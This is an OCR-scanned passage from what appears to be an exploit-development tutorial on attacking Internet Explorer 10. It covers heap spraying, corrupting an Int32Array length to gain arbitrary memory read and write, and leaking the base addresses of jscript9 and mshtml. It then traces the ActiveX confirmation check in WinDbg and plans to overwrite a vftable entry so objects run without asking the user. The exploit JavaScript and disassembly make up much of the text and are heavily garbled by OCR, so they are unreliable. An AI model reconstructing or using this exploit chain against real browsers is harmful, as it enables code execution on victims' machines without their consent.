the entire process address space. The trick is to modify the length field of an array (or similar data structure) 


so that we can read and write beyond the end of the array in normal javascript code. 


We need to perform two 


1 and a raw buffer (associated with an )on the heap. 


2. and allocated on IE's custom heap. 


Here's the relevant javascript code: 


XHTML 


«html» 
«head» 
<script language="javascript"> 


( 


inction() { 
alert("Starting!"); 


for (i = 0; i < Ox200; ++i) { 
Array(0x3c00); 
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(; i < 0x200 + 0x400; ++i) ( 
a[i] = new Array(Ox3bf8) 

for (j = 
ай 


0: | < 0x55; ++]) 
= Int32Array(buf) 
) 


alert("Set byte at OcOaf01b to 0x20"); 


alert("All done!"); 





The two heap sprays are illustrated in the following picture: 


23422 
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These data structures are allocated on the heap 


8-byte header | Ox68-byte LargeHeapBlock 
8-byte header | Ox68-byte LargeHeapBlock 
8-byte header | Ox68-byte LargeHeapBlock 


8-byte header | Ox68-byte LargeHeapBlock 
8-byte header | Ox68-byte raw buffer 
8-byte header | Ox68-byte LargeHeapBlock 


These data structures are allocated on IE's custom heap 


OxO: 
Ox10: 


0x20: 


0х(000: 
Oxf030: 


OxffcO: 
OxfffO: 


allocation header 
Array header 


array[0] Array(Ox3bf8) 


array[Ox3bf7] 
Int32Array 
Int32Array 


0x55 Int32Arrays 


Int32Array 
Alignment padding 
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There are a few important things to know. The goal of the first heap spray is to put a buffer (associated with 
an ArrayBuffer) between LargeHeapBlocks. LargeHeapBlocks and buffers are allocated on the same heap, 
so if they have the same size they're likely to be put one against the other in memory. Since a 
LargeHeapBlock is 0x58 bytes, the buffer must also be 0x58 bytes. 


The objects of the second heap spray are allocated on a custom heap. This means that even if we wanted to 
we couldn't place, say, an Array adjacent to a LargeHeapBlock. 


The int32Arrays of the second heap spray reference the ArrayBuffer buf which is associated which the raw 
buffer allocated in the first heap spray. In the second heap spray we allocate 0x400 chunks of 0x10000 
bytes. In fact, for each chunk we allocate: 


• an Array of length Ox3bf8 ==> Ox3bf8*4 bytes + 0x20 bytes for the header = 0xf000 bytes 
• 0x55 Int32Arrays for a total of 0х30*0х55 = OxffO. 


We saw that an Int32Array is 0x24 bytes, but it's allocated in blocks of 0x30 bytes so its effective size is 
0x30 bytes. 


As we were saying, a chunk contains an Array and 0x55 Int32Arrays for a total of Oxf000 + OxffO = Охо 
bytes. It turns out that Arrays are aligned in memory, so the missing 0x10 bytes are not used and each 
chunk is 0x10000 bytes. 


The javascript code ends with 


JavaScript 





alert("Set byte at OcOaf01b to 0x20"); 


First of all, let's have a look at the memory with VMMap: 
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Process: iexplore.exe 
PID: 4980 
Committed: 261.060 К 


Address Spac 


Private Bytes: 0x00000000 | 18.840 K 


Working 06.600 K 


Mapped File 
Shareable 


Page Table 0xc0a0000 


Unusable 


Ox2FOBA000 





As you can see, is well inside our heap spray (the second one). Let’s have a look at the memory 
inside WinDbg. First, let’s look at the address where we should find an 
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| Note that the first element of the Array is 
| a pointer to an Int32Array of the previous 
chunk (instead of the current one). 





Note that the second heap spray is not exactly as we would expect. Let’s look at the code again: 


JavaScript 





Since in each chunk the are allocated right after the and the first elements of 
that point to the newly allocated , one would expect that the first element of the 
would point to the first allocated right after the , but that's not what happens. The problem is 
that when the second heap spray starts the memory has a bit of fragmentation so the first and 

are probably allocated in blocks which are partially occupied by other objects. 


This isn't a major problem, though. It just means that we need to be careful with our assumptions. 


Now let's look at address . There, we should find the first of the chunk: 
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Memory 


first Int32Array 


5Ь54144ссҒ1ағ 5 





The int32Array points to a raw buffer at 429af28, which is associated with the ArrayBuffer buf allocated on 
the regular heap together with the | argeHeapBlocks. Let's have a look at it: 
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Memory 
Virtual: 0 


There is some junk 
between these two 
LargeHeapBlocks! 





This picture shows a disconcerting situation. First of all, the first two aren't adjacent, which 
is a problem because the space between them is pretty random. Second, each points to 
the next block, contrarily to what we saw before (where each block pointed to the previous one). 


Let's reload the page in IE and try again: 
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© 
ооооо: 


о 


qm 
eot 


ооо оо о 
‹ jc 


2160010) 


eo 


оосо 


gment::'vft 





The point forwards, again. Let's try another time: 
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Display format: | Long Hex 


00001 


) c 
) С ‹ 
у о 

о о 
)ce 


Memory 


Virtual: 0 Е ” | Previous 


1 
1 
1 
1 
1 
1 
1 
1 
1 
1 
1 
1 
0! 1 0 
1 
1 
1 
1 
1 
1 
1 
1 
1 
1 
1 
1 


у 
у 
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We can conclude that the LargeHeapBlocks tend to point forwards. | suspect that the first time they pointed 
backwards because the LargeHeapBlocks were allocated in reverse order, i.e. going towards lower 
addresses. 


We saw a few ways things may go wrong. How can we cope with that? | came up with the solution of 
reloading the page. We can perform some checks to make sure that everything is alright and, if it isn’t, we 
can reload the page this way: 


JavaScript 





We need to wrap the code into a function so that we can use return to stop executing the code. This is 
needed because reload() is пої instantaneous and something might go wrong before the раде is reloaded. 


As we already said, the javascript code ends with 


JavaScript 





Look at the comments. The field array len of the Int32Array at OxcOaf000 is initially 0x16. After we write 
0x20 at OxcOaf0 1b, it becomes 0x20000016. If the raw buffer is at address 0x8ce0020, then we can use the 
Int32Array at OxcOaf000 to read and write throughout the address space [0x8ce0020, 0x8ce0020 + 
0х20000016*4 – 4]. 


To read and write at a given address, we need to know the starting address of the raw buffer, i.e. Ox8ce0020 
in the example. We know the address because we used WinDbg, but how can we determine it just with 
javascript? 


We need to do two things: 


1: Determine the Int32Array whose array len we modified (i.e. the one at OxcOaf000). 
2. Find buf addr by exploiting the fact that LargeHeapBlocks point to the next blocks. 


Here's the code for the first step: 
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JavaScript 


int32array - 0; 
(i = 0x200; i « 0x200 + 0x400; ++i) { 
г (j = 0; | «0x55; ++]) ( 
(ај у  лепаћ != 0x58/4) { 
int32array = a[i][j]; 


| | 
(int32array !- 0) 
if (int32array == 0) ( 


alert("Can't find int32array!"); 
window.location.reload(); 


5 





You shouldn't have problems understanding the code. Simply put, the modified is the one with a 
length different from the original . Note that if we don't find the , we reload the page 
because something must have gone wrong. 
Remember that the first element of the at doesn't necessarily points to the at 

, SO we must check all the 
It should be said that it's not obvious that by modifying the field of an we can read/write 
beyond the end of the raw buffer. In fact, an also points to an which contains the real 


length of the raw buffer. So, we're just lucky that we don't have to modify both lengths. 
Now it's time to tackle the second step: 


JavaScript 





г vftptr1 = int32array[0x60/4], 


-352- 





vftptr2 = int32array[0x60*2/4], 
vftptr3 = int32array[0x60*3/4], 
nextPtr1 = іпіЗ2аггау[(0х60+0х24)/4], 
nextPtr2 = int32array[(0x60*2--0x24)/4], 
nextPtr3 = іпіЗ2аггау[(0х60*3+0х24)/4]; 
if (vftptr1 & Oxffff != 0x6e18 || vftptr1 != vftptr2 || vftptr2 != vftptr3 || 
nextPtr2 - nextPtr1 != 0x60 || nextPtr3 - nextPtr2 != 0x60) ( 


alert("Error!"); 
window.location.reload(); 


| 
) 


buf addr = nextPtr1 - 0x60*2; 





Remember that is the modified at . We read the vftable pointers and the 
forward pointers of the first 3 . If everything is OK, the vftable pointers are of the form 
and the forward pointers differ by , which is the size of a plus the 8-byte 


allocation header. The next picture should help clarify things further: 


vftptr1 = int32array[0x60/4] 


vftptr2 = int32array[0x60*2/4] 


ућриз = int32array[0x60*3/4] с. Ty CE : : 331 nextPtr3 nt32array[(0x60* 3+0Х y4] 


vftptr1 & Oxffff == 0x6e18 
vftptr1 == vftptr2 
vftptr2 == vftptr3 


dc4 





Now that contains the starting address of the raw buffer, we can read and write everywhere in 
. To have access to the whole address space, we need to modify the 
at again. Here’s how: 
JavaScript 
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(Охосба/0000х1с - buf addr)/4] != buf ac 


0; 


Еггог!"); 


[(0x0cOaf000-0x18 - I 1г)/4] = 0x20000000; 
[(0хОс0аѓ000+0х1с - Idr)/4] = 0; 


ess-k)/4] >> k*8) | 
-k+4)/4] << (32 - k*8)); 


= int32array/( 
Sd esa 1, 6 
& 


) 
& (ОХЕ - i le >> (32 - k*8)); 
Idi -k)/4 ; 


Let's look at the comments again: 


JavaScript 


In the code above ме set to 0. Now we can read/write throughout 
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Note that ће part of and that's supposed to handle the case when address is not a multiple of 
was never tested, because it wasn't needed after all. 


Leaking the address of an object 
We need to be able to determine the address of an object in javascript. Here’s the code: 


JavaScript 


(i = 0x200; i < 0x200 + 0x400; ++i) 
ali][0x3bf7] = 0: 


write(OxOcOaf000-4, 3); 

leakArray = 0; 
(i = 0x200; i < 0x200 + 0x400; ++i) | 
(afi][Ox3bf7] != 0) { 
leakArray = ali]; 


} 


(leakArray == 0) { 
alert("Can't find leakArray!"); 
window. location.reload(); 


} 


get_addr(obj) { 
leakArray[Ox3bf7] = obj; 
read(0xOcOaf000-4); 
) 





We want to find the at . We proceed like this: 
1: We zero out the last element of every ( ). 
2. We write 3 at ‚ Le. we assign 3 to the last element of the at . 
3: We find the whose last elementis not zero, i.e. the at and make 
point to it. 
4. We define function which: 
a takes a reference, obj, to an object 
b. writes to the last element of 
с. reads back by using , which reveals the real value of the pointer 
The function is very important because lets us determine the real address in memory of the objects 
we create in javascript. Мом we can determine the base address of апа as follows: 
JavaScript 


- 355 - 





EXPLOIT DEVELOPMENT COMMUNITY 


= read(0xOcOaf000) - 0x3b60; 


| t("div")); 





ir + 0x10) - Ox58b9a; 


The code above is very simple. We know that at OxcOaf000 we have an Int32Array and that its first dword is 
the vftable pointer. Since the vftable of a TypedArray<int> is in the module jscript9.dll and is at a fixed RVA, 
we can easily compute the base address of jscript9 by subtracting the RVA of the vftable from its actual 
address. 


Then we create a div element, leak its address and note that at offset 0x10 we can find a pointer to 
MSHTML!CBaseTypeOperations::CBaseFinalizer, which can be expressed as 


mshtml + RVA = mshtml + 0x58b9a 


As before, we can determine the base address of mshtml.dll with a simple subtraction. 
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IE10: God Mode (1) 


When an html page tries to load and run an ActiveX object in IE, the user is alerted with a dialog box. For 
instance, create an html file with the following code: 


XHTML 


head 
pt language="jav 





If you open this file in IE, you should get the following dialog box: 


Internet Explorer 





If we activate the so-called God Mode, IE runs the ActiveX object without asking for the user’s permission. 
Basically, we'll just use our ability to read and write where we want to alter the behavior of IE. 


But what's so interesting in popping up a calculator? That's a valid demonstration for general shellcode 
because it proves that we can run arbitrary code, but here we've just proved that we can execute any 
program which resides on the user's hard disk. We'd like to execute arbitrary code, instead. 


One solution is to create an .exe file containing code and data of our choosing and then execute it. But for 
now, let's try to bypass the dialog box when executing the code above. 


Bypassing the dialog box 


The dialog box displayed when the code above is run looks like a regular Windows dialog box, so it’s likely 
that IE uses the Windows АРІ to create it. Let's search for msdn dialog box with google. The first result is 
this link: 


https://msdn.microsoft.com/en-us/library/windows/desktop/ms645452%28v=vs.85%29.aspx 
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As you can see in the following picture, there are a few functions used to create dialog boxes: 


Sg DialogBox function (Wind... 


€ à 


microsoft.com, 


Outline” Resize" х Tools” № View Source” |; Options" 


— 


Miscellaneous" ; 


Disable" «№ Cookies: / CSS* [Д Forms” |Ш Images" @ Information" 


dal dialog b rom а dialc t return c 


source. DialogBox does 
ју calling the EndDialog fur 


DialogBox is imp! 
Syntax 


Се 


INT РТВ WINAPI DialogBox( 
.In opt | HINSTANCE hInstance, 


za n. 
.In opt. 
.In opt. 


LPCTSTR lpremplate, 
HWND hWndParent, 
DLGPROC lpDialogrunc 


); 


Parameters 


Іп, opt 
ype: HINSTANCE 


s NULL, then the 





By reading the Remarks section we discover that calls : 
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| 88 DialogBox function (Wind... 


€ an microsoft.com 


Disable" „№ Cookies" p CSS Forms” [6] Images" @ Information" Miscellaneous" Outline” Resizer х Tools” Ш View Source" |; Options" 
CreateUialogParam А 
in the call to the EndDialog fun 


efDlgPr ninate the 


Remarks 


The DialogBox ma 


s the dialog 


Examples 


For an example, see Creating а Modal Dialog Box. 





Requirements 


When we look at the other functions used to create dialog boxes, we find out that they also call 
, SO we should put a breakpoint on 


First of all, we load the html page above in IE and, before allowing the blocked content (IE asks for a 
confirmation when you open local html files), we put a breakpoint on (both the and 
the version) in WinDbg: 

0:016> bp createwindowexw 


0:016» bp createwindowexa 





Then, when we allow the blocked content, the breakpoint on is triggered. Here’s the 
stack trace: 

0:007» k 20 

ChildEBP RetAddr 

042bae7c 73844467 user32!CreateWindowExW 

042baebc 6eeee9fa IEShims!NS HangResistancelnternal::APIHook CreateWindowExW 0x64 


042baefc 6efb9759 IEFRAME!SHFusionCreateWindowEx-*0x47 
04266058 6efb951e |ЕЕКАМЕ!СВгомзегЕгате {ае::ЕтаТа ОРЕготКВоо 11-1:10119 550):4 36 
042bb0a4 6efb9409 IEFRAME!UnifiedFrameAware_AcquireModalDialogLockAndParent+Oxe9 
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042660с4 738е8с5с IEFRAME!TabWindowExports::AcquireModalDialogLockAndParent+0x1b 
042bb0e0 74е7Юс8 ІЕ5ћітѕ! М ШіЅирргеѕѕіоп::АРІНоок ОіаіодВохРагат\№/+0х31 
04266910 74e9efe0 urlmon!CSecurityManager::DisplayMessage+0x40 


04266ср4 74dff5d4 ийтоп!тетзе+0х120а0 

042bbcf8 6e2a84dc urlmon!CSecurityManager::ProcessUrlActionEx2-*0x1 5f 
042bbd6c 6e2a81ae MSHTML!CMarkup::ProcessURLAction2+0x31d 

042bbd9c бестт868 MSHTML!CMarkup::ProcessURLAction*Ox3e 

042bbe28 6e24d87d МНТМИтетсру+0х120100 

042bbe6c 04d5c12d MSHTML!CDocument::HostQueryCustomPolicy-*0x148 
042bbee4 04d5bfae jscript9!ScriptEngine::CanObjectRun+0x78 < 

042bbf30 04d5bde1 jscript9!ScriptSite::CreateObjectFromProgID+Oxdf < 
042bbf74 04d5bd69 jscript9!ScriptSite::CreateActivexObject+0x56 < 

042bbfa8 04cc25d5 jscript9! JavascriptActiveXObject::Newlnstance+0x90 
042bc000 04cc272e jscript9!Js::InterpreterStackFrame::NewScObject Helper*0xd6 
042bc194 04c95cf5 jscript9!Js::InterpreterStackFrame::Process-*0x2c6d 
042bc29c 034b0fe9 jscript9! Js::InterpreterStackFrame::InterpreterT hunk<1>+0x305 
WARNING: Frame IP not in any known module. Following frames may be wrong. 
042bc2a8 04c91f60 Ox34b0fe9 

042bc328 04c920ca jscript9!Js::JavascriptFunction::CallRootFunction+0x140 
042bc340 04с9209# jscript9! Js::JavascriptFunction::CallRootFunction+0x19 
042bc388 04с92027 jscript9! ScriptSite::CallRootFunction+0x40 

042bc3b0 04d3df75 jscript9!ScriptSite::Execute+0x61 

042bc43c 04d3db57 jscript9!ScriptEngine::ExecutePendingScripts+0x1e9 
042bc4c4 04d3e0b7 jscript9!ScriptEngine::ParseScriptT extCore+Ox2ad 
042bc518 6e37b60c jscript9! ScriptEngine::ParseScriptT ext+Ox5b 

042bc550 6e37945d MSHTML!CActiveScriptHolder::ParseScriptT ext+0x42 
0426с5а0 6e36b52f MSHTML!CJScript9Holder::ParseScriptText+0x58 
042bc614 6e37c6a4 MSHTML!CScriptCollection::ParseScriptText+0x1f0 





Three lines look particularly interesting: 


042bbee4 04d5bfae jscript9!ScriptEngine::CanObjectRun+0x78 < 


042bbf30 04d5bde1 jscript9!ScriptSite::CreateObjectFromProgID+Oxdf < 
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042561774 04455969 jscript9!ScriptSite::CreateActiveXObject+0x56 < 





Maybe the function CanObjectRun decides if the ActiveX object can run? Let's delete the previous 
breakpoints and put a breakpoint on jscript9!ScriptSite::CreateActiveXObject: 


bp jscript9!ScriptSite::CreateActiveXObject 


When we reload the html page and allow the blocked content in IE, we break on CreateActiveXObject. 
Here’s the code: 


jscript9!ScriptSite::CreateActiveX Object: 

04ееба8Ь ба18 push 18h 

O4eebd8d b81927eb04 тоу eax,offset jscript9!memset+0x2ac2 (04eb2719) 
04eebd92 e88752f2ff call jscript9! EH epilog3 GS (04е1101е) 

04еера97 83791000 стр dword ptr [ebp* 10h],0 

04eebd9b 865908 mov  ebx,dword ptr [ebp*8] 

04eebd9e 8b5b54 том  ebx,dword ptr [ebx+54h] 

O4eebda1 0f8571721600 jne  jscript9!memset*Oxf9c1 (05053018) 

04eebda7 8bcb mov  ecx,ebx 

04eebda9 8а75е8 lea esi, (= сједи а] 

O4eebdac e8f4feffff ^ call jscript9!AutoLeaveScriptPtr<IDispatch>::AutoLeaveScriptPtr<IDispatch> (04eebca5) 
04eebdb1 8365Гс00 and амога ptr [ebp-4],0 

04eebdb5 8365000 and dword ptr [ebp-10h],0 ss:002b:0446ba64-0446ba70 


04eebdb9 89690 mov dword ptr [ebp-10h],ebp 
04eebdbc 8d45dc lea eax,[ebp-24h] 

04eebdbf 50 push eax 

04eebdc0 8b45f0 mov eax,dword ptr [ebp-10h] 


04eebdc3 8bcb mov  ecx,ebx 

04еерас5 e87faaf9ff call jscript9!Js::LeaveScriptObject<1,1>::LeaveScriptObject<1 ,1> (04e86849) 
04eebdca 8b4d0c mov ecx,dword ptr [ebp+0Ch] 

04eebdcd 8bc6 том еах,еѕі 

04eebdcf c645fc01 mov byte ptr [ебр-4],1 

04eebdd3 8b7508 mov  esi,dword ptr [ebp+8] 

04eebdd6 50 push eax 

04eebdd7 #7510 push dword ptr [ebp+10h] 
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O4eebdda 8bd6 
04еебдас е8еа000000 са! 
O4eebde1 c645fc00 
Одеебде5 807de400 
04верае9 8bf8 


mov edx,esi 


jscript9!ScriptSite::CreateObjectFromProgID (04eebecb) < 


mov byte ptr [ebp-4],0 
byte ptr [ebp-1Ch],0 


еаі,еах 


cmp 


mov 





If we step inside jscript9!ScriptSite::CreateObjectFromProgID we see the following code: 


jscript9!ScriptSite::CreateObjectFromProgID: 


O4eebecb 8bff 
O4eebecd 55 
04еересе 8bec 
04eebed0 83ec34 


O4eebed3 а144630а05 


04еереа8 33c5 
04еереаа 8945fc 
O4eebedd 53 
O4eebede 8b5d0c 
04eebee1 56 
04eebee2 33c0 
04еерее4 57 
04eebee5 8b7d08 
04eebee8 8bf2 
04eebeea 8975dc 
04еерееад 8945cc 
04eebef0 897440 
04еереіз 894544 
O4eebef6 894548 
O4eebef9 894568 
O4eebefc 85ff 


04eebefe 0f85e26a1600 jne 


04ее0104 8b4604 


04eebf07 e8d5000000 call 
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mov 


edi,edi 


push ебр 


mov  ebp,esp 
sub  esp,34h 
mov 
xor  eax,ebp 
mov  dword ptr [ebp-4],eax 
push ebx 
mov  ebx,dword ptr [ebp*OCh] 
push esi 
хог  eax,eax 
push edi 


mov 


edi,dword ptr [ebp+8] 


esi,edx 


dword ptr [ebp-24h],esi 


mov 
mov 
mov  dword ptr [ebp-34h],eax 

dword ptr [ebp-30h],edi 


dword ptr [ebp-2Ch],eax 


mov 
mov 
mov  dword ptr [ebp-28h],eax 


mov dword ptr [ebp-18h],eax 


test edi,edi 
jscript9!memset+0xf390 (050529e6) 


mov eax,dword ptr [esi+4] 








eax,dword ptr [jscript9!___security__cookie (050a6344)] 


jscript9!ScriptEngine::InSafeMode (04eebfe1) 
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O4eebfOc 85с0 test eax,eax 

04eebf0e 8а45ес lea | eax|[ebp-14h] 

04eebf11 50 push еах 

04еер”12 51 push есх 

04eebf13 0f84d86a1600 je jscript9!memset+Oxf39b (05052911) 

04eebf19 #1508400905 call dword ptr 20110121 тр CLSIDFromProgiD (05094008)] 
O4eebf1f 8520 test eax,eax 


04ееб?21 Of88e867fcff js  jscript9!ScriptSite::CreateObjectFromProgID+Oxf6 (04eb270f) 
04eebf27 8а45ес lea | eax|[ebp-14h] 

04eebf2a 50 push eax 

O4eebf2b 864604 mov еах,дмога ptr [esi+4] 

04eebf2e ебве2030000 call jscript9!ScriptEngine::CanCreateObject (04еес315) < 
04eebf33 85c0 test eax,eax 

O4eebf35 Of84d467fcff је  jscript9!ScriptSite::CreateObjectFromProgID+0xf6 (04eb270f) 





If we keep stepping through the code, we get to jscript9!ScriptEngine::CanCreateObject. This function also 
looks interesting. For now, let's note that it returns 1 (i.e. БАХ = 1) in this case. We continue to step through 
the code: 


04eebf3b бао5 ризћ 5 

04eebf3d 58 pop еах 

O4eebf3e 85ff test еді,еаі 

04eebf40 Of85b66a1600 jne  jscript9!memset+Oxf3a6 (050529) 
O4eebf46 8d4de4 lea ecx,[ebp-1Ch] 

04eebf49 51 push ecx 

04eebf4a 68acOfec04 push offset jscript9!lID_IClassFactory (04ecOfac) 
04eebf4f ff75e8 push dword ptr [ebp-18h] 


04eebf52 50 push eax 

04eebf53 8d45ec lea eax,[ebp-14h] 

04eebf56 50 push eax 

04eebf57 #1504400905 call dword ptr [jscript9!_imp__CoGetClassObject (05094004)] 
04eebf5d 85c0 test eax,eax 

04eebf5f Of88aa67fcff js  jscript9!ScriptSite::CreateObjectFromProgID+0xf6 (04eb270f) 
04eebf65 8b45e4 mov eax,dword ptr [ebp-1Ch] 
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04eebf68 8b08 mov есх,амога ptr [eax] 

04eebf6a 8d55e0 lea edx,[ebp-20h] 

04eebf6d 52 push edx 

04eebf6e 68ccbfee04 push offset jscript9!lID_IClassFactoryEx (04eebfcc) 

04eebf73 50 push eax 

04eebf74 ff11 call dword ptr [ecx] ds:002b:040725f8={wshom!CClassFactory::Querylnterface (04080554) 
04eebf76 85c0 test eax,eax 

04eebf78 8b45e4 mov eax,dword ptr [ebp-1Ch] 

O4eebf7b 8b08 mov есх,амога ptr [eax] 

04eebf7d 0f89a76a1600 jns jscript9!memset+0xf3d4 (05052а2а) 

04eebf83 53 push ebx 

04eebf84 681c13e104 push offset jscript9!IID_IUnknown (04e1131c) 

04eebf89 баоо ризћ 0 

04eebf8b 50 push eax 

O4eebf8c ff510c call dword ptr [ecx*OCh] ds:002b:04072604 -(wshom!CClassFactory::Createlnstance (04080613)) 
O4eebfaf 850 mov  esi,eax 

04ее 91 8b45e4 том eax,dword ptr [ebp-1Ch] 

04ее 94 8508 mov есх,амога ptr [eax] 

04eebf96 50 push eax 

04eebf97 ff5108 call dword ptr [есх+8] ds:002b:04072600={wshom!CClassFactory::Release (04080909)} 
04eebf9a 85f6 test esi,esi 

04eebf9c 7818 js јѕсгірі9!Ѕсгірібіќе::СгеаїеОбјесіҒготРгодір+0хез (04eebfb6) 
04eebf9e 8b4ddc mov ecx,dword ptr [ebp-24h] 

O4eebfa1 #33 push  dword ріг [ебх] 

O4eebfa3 8b4904 mov  ecx,dword ptr [есх+4] 

04ее аб 8d55ec lea | edx|[ebp-14h] 

О4еебға9 е807010000 call jscript9!ScriptEngine::CanObjectRun (04еес065) < 

04еерїае 85c0 test eax,eax 

04eebfb0 0f8467a90800 je  jscript9!ScriptSite::CreateObjectFromProgID+Oxfd (04176914) < 
O04eebfb6 8b4dfc mov ecx,dword ptr [ebp-4] 

O4eebfb9 5f pop edi 


04eebfba 8bc6 mov eax, esi 
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04eebfbc 5e pop esi 


O4eebfbd 33cd xor ecx,ebp 

04eebfbf 5b рор ебх 

O04eebfcO e87953f2ff са! jscript9! security check cookie (04e1133e) 
04еебїс5 c9 leave 

O4eebfc6 c20800 ret 8 





Finally, we get їо jscript9!ScriptEngine::CanObjectRun. When we step over it, the familiar dialog box pops 
up: 


Internet Explorer 





Let's click on Yes and go back in WinDbg. We can see that CanObjectRun returned 1 (i.e EAX = 1). This 
means that ће je at O4eebfbO is not taken and CreateObjectFromProg!D returns. We can see that ће 
calculator pops ир. 


Now let's put a breakpoint right at 04eebfae, reload the page in IE and let's see what happens if we click on 
No when the dialog box appears. Now EAX is 0 and je is taken. If we resume the execution, we can see that 
the calculator doesn't pop up this time. 


So, if we want to bypass the dialog box, we must force CanObjectRun to return true (i.e. EAX != 0). 
Unfortunately, we can't modify the code because it resides on read-only pages. We'll need to think of 
something else. 


Let's put a breakpoint on jscript9!ScriptEngine::CanObjectRun and reload the page in IE. This time, we're 
stepping inside CanObjectRun: 

jscript9!ScriptEngine::CanObjectRun: 

O4eec0b5 8bff тоу edi,edi 

O4eec0b7 55 push ebp 


04eec0b8 8bec mov ebp,esp 
04eec0ba 83ec48 sub  esp,48h 
О4еесоба а144630а05 тоу eax,dword ptr [jscript9!_security_cookie (050а6344)] 
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04еес0с2 33c5 xor  eax,ebp 

04еес0с4 8945f8 mov dword ptr [ебр-8],еах 

04eec0c7 53 push ebx 

04eec0c8 8b5d08 mov  ebx,dword ptr [ebp+8] 

04eec0cb 56 ризћ esi 

04еес0сс 57 push edi 

04еес0са 8bf9 mov  edi,ecx 

O4eecOcf 8bf2 mov  esi,edx 

04еес0а1 8bc7 mov  eax,edi 

04eec0d3 8975cc mov dword ptr [ebp-34h], esi 

04еес0а6 евоби  _ call jscript9!ScriptEngine::InSafeMode (04eebfe1) 
04eecOdb 85с0 test eax,eax 

O4eecOdd 0f844e581600 je  jscript9!memset+Oxe3b4 (05051931) 
04eec0e3 16872401000008 test byte ptr [еаі+1Е4һ],8 

04eec0ea 018450581600 је jscript9!memset+0xe3c3 (05051940) 
04eec0f0 8d45bc lea eax,[ebp-44h] 


04eec0f3 50 push eax 
04eec0f4 е87а020000 call jscript9!ScriptEngine::GetSiteHostSecurityManagerNoRef (04eec373) 


04eec0f9 85c0 test eax,eax 

O4eecOfb 0f8838581600 js  jscript9!memset+Oxe3bc (05051939) 
04eec101 8b45bc mov eax,dword ptr [ebp-44h] 
04eec104 8d7dd0 lea edi,[ebp-30h] 

04eec107 a5 movs dword ptr es:[edi],dword ptr [esi] 
04eec108 a5 movs dword ptr es:[edi],dword ptr [esi] 
04eec109 a5 movs dword ptr es:[edi],dword ptr [esi] 
04eec10a a5 movs  dword ptr es:[edi],dword ptr [esi] 
04еес106 8954ае0 mov  dword ptr [ebp-20h],ebx 
04eec10e 33db xor ебх,ебх 

04eec110 53 push ebx 

04eec111 6a18 push 18h 

04eec113 8d55d0 lea edx,[ebp-30h] 

04eec116 52 push edx 
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04eec117 8d55cc lea edx,[ebp-34h] 

04еес11а 52 push едх 

04еес116 8а55с0 lea | edx,[ebp-40h] 

04еес11е 52 push едх 

04еес11# 6868с1ее04 push offset jscriptgIGUID CUSTOM CONFIRMOBJECTSAFETY (04еес168) 
04eec124 895de4 mov dword ptr [ebp-1Ch],ebx 


04еес127 8608 mov есх,амога ptr [eax] 


04еес129 50 ризћ еах 
04eec1 2a #5114 call dword ptr [ecx* 14h] ds:002b:6ed255fA-(MSHTML'!TearoffThunk5 (6e1dafe5)) < 


04eec12d 85с0 test eax,eax 

04еес12# 018804581600 js  jscript9!memset+Oxe3bc (05051939) 
04еес135 8645с0 mov еах,адмога ptr [ebp-40h] 

04eec138 6a03 push 3 





When we step over the call at 04eec12a, the familiar dialog box pops up. Let's keep stepping: 


04еес1За 5b pop ebx 

04eec13b 85с0 test eax,eax 

04eec13d 740f је jscript9!ScriptEngine::CanObjectRun+0x99 (04еес14е) 
04eec13f 837dcc04 стр dword ptr [ebp-34h],4 

04eec143 7202 jb —_jscript9!ScriptEngine::CanObjectRun+0x92 (04eec147) 
04еес145 8618 mov  ebx,dword ріг [eax] 

04eec147 50 push eax 

04еес148 #151с400905 са! амога ptr [јѕсгір{9! imp СоТаѕкМетЕгее (0509401с)] 
04еес14е ба00 ризћ 0 

04еес150 f6c30f test bl,OFh 

04еес153 58 pop еах 

04еес154 0f94c0 sete al 

04eec157 8b4df8 mov  ecx,dword ptr [ebp-8] 


04eec15a 5f рор edi 


04eec15b 5e pop esi 
04еес15с 33cd xor  ecx,ebp 
04еес15е 5b pop ebx 
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04eec15f e8da51f2ff call jscript9!_ security check cookie (04e1133e) 
04eec164 c9 leave 


04eec165 c20400 ret 4 





Finally, CanObjectRun returns. 


Let’s look again at the following three lines of code: 


04eec127 8b08 mov  ecx,dword ptr [eax] ; ecx = vftable pointer 


04еес129 50 push eax 


04eec1 2a #5114 call dword ptr [ecx+14h] ds:002b:6ed255fA-(MSHTML'TearoffThunk5 (6e1dafe5)) 





It's pretty clear that the first line reads the vitable pointer from the first dword of the object pointed to by eax 
and that, finally, the third instruction calls the 6th virtual function (offset 14h) in the vftable. Since all vftables 
are located at fixed RVAs, we can locate and modify this vftable so that we can call whetever code we want. 


Right before the call at 04eec12a, eax is clearly non zero, so, if we were to return immediately from 
CanObjectRun, CanObjectRun would return true. What happens if we overwrite the 6th pointer of the vftable 
with the value 04eec164? 


What happens is that the call at 04eec127 will call the epilog of CanObjectRun so CanObjectRun will end 
and return true. Everything works correctly because, even if the call at 04еес127 push а ret eip on the stack, 
the epilog of CanObjectRun will restore esp to the correct value. Remember that leave is equivalent to the 
following two instructions: 


mov esp, ebp 


pop ebp 





Let's put a breakpoint at 04еес12а, reload the page in IE and, when the breakpoint is triggered, examine the 
vftable: 
0:007? In ecx 
(6ed255e0) MSHTML!s_apfnPlainTearoffVtable | (6ed25ce8) MSHTML!s_apfnEmbeddedDocTearoffVtable 
Exact matches: 
MSHTML!s_apfnPlainTearoffVtable = <no type information> 
0:007> dds ecx 


6ed255e0 бе162681 MSHTML!PlainQuerylnterface 
6ed255e4 6e1625a1 MSHTML!CAPProcessor::AddRef 
6ed255e8 6e13609d MSHTML!PlainRelease 
6ed255ec 6e128eb5 MSHTML! TearoffThunk3 
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6ed255f0 6e30604a MSHTML!Tearofffhunk4 
6ed255f4 6e1dafe5 MSHTML!Tearofffhunk5 < we want to overwrite this 
6ed255f8 бе149а77 MSHTML!TearoffThunk6 
6ed255fc 6e2b1a73 MSHTML! TearoffT hunk7 
6ed25600 6e1d770c MSHTML! TearoffT hunks 
6ed25604 6e1db22c MSHTML'!TearoffThunk9 
6ed25608 6e1db1e3 MSHTML!TearoffThunk10 
6ed2560c безо7а65 MSHTML! TearoffThunk11 
6ed25610 6e1db2b8 MSHTML!TearoffThunk12 
6ed25614 6e3e2a3d MSHTML!TearoffThunk13 
6ed25618 6e2f2719 MSHTML'TearoffThunk14 
6ed2561c 66304879 MSHTML'!TearoffThunk15 
6ed25620 6e1db637 MSHTML!TearoffThunk16 
6ed25624 6e1e1bf3 MSHTML!TearoffThunk17 
6ed25628 6e1d9649 MSHTML!TearoffThunk18 
6ed2562c 66558422 MSHTML'!TearoffThunk19 
6ed25630 6e63bc4a MSHTML'TearoffThunk20 
